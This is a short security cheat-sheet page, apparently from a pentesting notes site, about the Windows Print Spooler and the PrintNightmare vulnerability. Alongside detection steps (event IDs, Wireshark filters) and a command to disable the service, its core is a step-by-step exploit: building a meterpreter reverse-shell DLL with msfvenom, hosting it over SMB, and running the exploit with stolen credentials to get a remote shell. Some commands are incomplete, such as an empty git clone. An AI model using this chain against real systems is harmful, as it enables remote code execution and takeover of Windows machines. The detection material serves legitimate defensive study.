Windows Print Spooler Service

Last modified: 2023-08-03

Printer Windows

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).


# Check if the Print Spooler service is running
Get-Service -Name Spooler



  1. Open Services.
  2. We can find the Print Spooler on the Right Pane.
  3. Double-click on it and see the details.

Malicious DLL Location


Event Viewer

Open Event Viewer, and find event logs in the following directory in the left pane.
If you want to filter by Event ID, use "Filter Current Log" in the right pane.

  • Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
  • Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
  • Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
  • Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)
  • Windows Logs/System (Event ID: 7031)

Packet Analysis (Wireshark)

Open .pcap file with Wireshark.

Filter packets with "smb" or "smb2".


This is security vulnerability to remote code execution in print spooler service.
It requires authentication (username/password).

1. Clone the Repository

git clone

2. Create a Malicious DLL using Msfvenom

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

3. Start Metasploit and Reverse TCP


msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

4. Host the Malicious DLL

impacket-smbserver share ./share/  -smb2support

5. Examine the Target Fits the Criteria to Exploit It

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

6. Run the Exploit

cd CVE-2021-1675
python3 Domain.Controller.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

7. Interact with Target System

Enter the target system via msfconsole.

msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami


# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled